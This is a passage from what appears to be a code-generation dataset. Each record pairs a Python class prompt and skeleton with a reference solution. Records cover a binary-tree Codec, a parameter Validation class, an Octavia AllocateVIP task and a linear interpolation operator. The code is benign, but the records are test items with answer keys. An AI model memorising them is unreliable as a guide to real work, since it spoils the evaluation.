string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "revision_id": "1461b10b8910fa90a311939c6df9082a8526f9b1", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n", "source": "the_stack_v2_python_sparse", "source_path": "Hard/297_serialize&DeserializeBinaryTree.py", "source_repo": "Yucheng7713/CodingPracticeByYuch", "split": "test", "star_events_count": 0} {"blob_id": "aa8e640e78b3314d2df0cdb2c0228830056cab9d", "bodies": ["if isinstance(x, valid_type):\n pass\nelse:\n raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')", "if x in valid_value:\n pass\nelse:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')", "out = []\nfor each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\nif len(out) > 1:\n return tuple(out)\nelse:\n return out[0]"], "bodies_text": "<|body_start_0|>\n if isinstance(x, valid_type):\n pass\n else:\n raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n if x in valid_value:\n pass\n else:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n out = []\n for each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\n if len(out) > 1:\n return tuple(out)\n else:\n return out[0]\n<|end_body_2|>\n", "class_docstring": "A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.", "class_name": "Validation", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Validation:\n \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n def validate_type(x, valid_type):\n \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_0|>\n\n def validate_value(x, valid_value):\n \"\"\"Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_1|>\n\n def to_device(*args, device=None):\n \"\"\"transfer all of ``args`` to ``device``\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(x, valid_type):\n pass\n else:\n raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n if x in valid_value:\n pass\n else:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n out = []\n for each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\n if len(out) > 1:\n return tuple(out)\n else:\n return out[0]\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000080", "length_bytes": 3049, "license_type": "permissive", "methods": [{"docstring": "Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError", "name": "validate_type", "signature": "def validate_type(x, valid_type)"}, {"docstring": "Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError", "name": "validate_value", "signature": "def validate_value(x, valid_value)"}, {"docstring": "transfer all of ``args`` to ``device``", "name": "to_device", "signature": "def to_device(*args, device=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000310", "prompt": "Implement the Python class `Validation` described below.\n\nClass description:\nA class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\n\nMethod signatures and docstrings:\n- def validate_type(x, valid_type): Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def validate_value(x, valid_value): Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def to_device(*args, device=None): transfer all of ``args`` to ``device``", "prompted_full_text": "Implement the Python class `Validation` described below.\n\nClass description:\nA class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\n\nMethod signatures and docstrings:\n- def validate_type(x, valid_type): Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def validate_value(x, valid_value): Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def to_device(*args, device=None): transfer all of ``args`` to ``device``\n\n<|skeleton|>\nclass Validation:\n \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n def validate_type(x, valid_type):\n \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_0|>\n\n def validate_value(x, valid_value):\n \"\"\"Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_1|>\n\n def to_device(*args, device=None):\n \"\"\"transfer all of ``args`` to ``device``\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(x, valid_type):\n pass\n else:\n raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n if x in valid_value:\n pass\n else:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n out = []\n for each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\n if len(out) > 1:\n return tuple(out)\n else:\n return out[0]\n<|end_body_2|>\n", "revision_id": "238cbc41865ddf629bb6ae92c2e1445be27f98b8", "skeleton": "<|skeleton|>\nclass Validation:\n \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n def validate_type(x, valid_type):\n \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_0|>\n\n def validate_value(x, valid_value):\n \"\"\"Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n <|body_1|>\n\n def to_device(*args, device=None):\n \"\"\"transfer all of ``args`` to ``device``\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Validation:\n \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n def validate_type(x, valid_type):\n \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n if isinstance(x, valid_type):\n pass\n else:\n raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n\n def validate_value(x, valid_value):\n \"\"\"Check whether an object's value is one of `valid_type`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n if x in valid_value:\n pass\n else:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n\n def to_device(*args, device=None):\n \"\"\"transfer all of ``args`` to ``device``\"\"\"\n out = []\n for each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\n if len(out) > 1:\n return tuple(out)\n else:\n return out[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "gcastle/castle/algorithms/gradient/corl/torch/utils/validation.py", "source_repo": "huawei-noah/trustworthyAI", "split": "test", "star_events_count": 832} {"blob_id": "0101cb4e170a8d168a24134fee231c0d44274d44", "bodies": ["LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\nsession = db_apis.get_session()\nwith session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\nvip, additional_vips = self.network_driver.allocate_vip(db_lb)\nLOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\nfor add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\nreturn (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])", "if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\nvip, additional_vips = result\nvip = data_models.Vip(**vip)\nLOG.warning('Deallocating vip %s', vip.ip_address)\ntry:\n self.network_driver.deallocate_vip(vip)\nexcept Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})"], "bodies_text": "<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "class_docstring": "Task to allocate a VIP.", "class_name": "AllocateVIP", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000081", "length_bytes": 44034, "license_type": "permissive", "methods": [{"docstring": "Allocate a vip to the loadbalancer.", "name": "execute", "signature": "def execute(self, loadbalancer)"}, {"docstring": "Handle a failure to allocate vip.", "name": "revert", "signature": "def revert(self, result, loadbalancer, *args, **kwargs)"}], "n_methods": 2, "prompt": "Implement the Python class `AllocateVIP` described below.\n\nClass description:\nTask to allocate a VIP.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer): Allocate a vip to the loadbalancer.\n- def revert(self, result, loadbalancer, *args, **kwargs): Handle a failure to allocate vip.", "prompted_full_text": "Implement the Python class `AllocateVIP` described below.\n\nClass description:\nTask to allocate a VIP.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer): Allocate a vip to the loadbalancer.\n- def revert(self, result, loadbalancer, *args, **kwargs): Handle a failure to allocate vip.\n\n<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "revision_id": "0426285a41464a5015494584f109eed35a0d44db", "skeleton": "<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n", "source": "the_stack_v2_python_sparse", "source_path": "octavia/controller/worker/v2/tasks/network_tasks.py", "source_repo": "openstack/octavia", "split": "test", "star_events_count": 147} {"blob_id": "897eabf748f70b3612138f4a7e1f4baf5eb37d79", "bodies": ["self.__nm = nm\nself.__om = om\nself.__dm = dm\nself.__nd = len(crd)\nself.__crd = crd\nif self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')", "if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\nif add == False:\n dat[:] = 0.0\nforward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)", "if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\nif add == False:\n mod[:] = 0.0\nadjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)", "m = np.random.rand(self.__nm).astype('float32')\nmh = np.zeros(self.__nm, dtype='float32')\nd = np.random.rand(self.__nd).astype('float32')\ndh = np.zeros(self.__nd, dtype='float32')\nif add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\nelse:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))"], "bodies_text": "<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n<|end_body_3|>\n", "class_docstring": "A linear interpolation operator", "class_name": "lint", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / 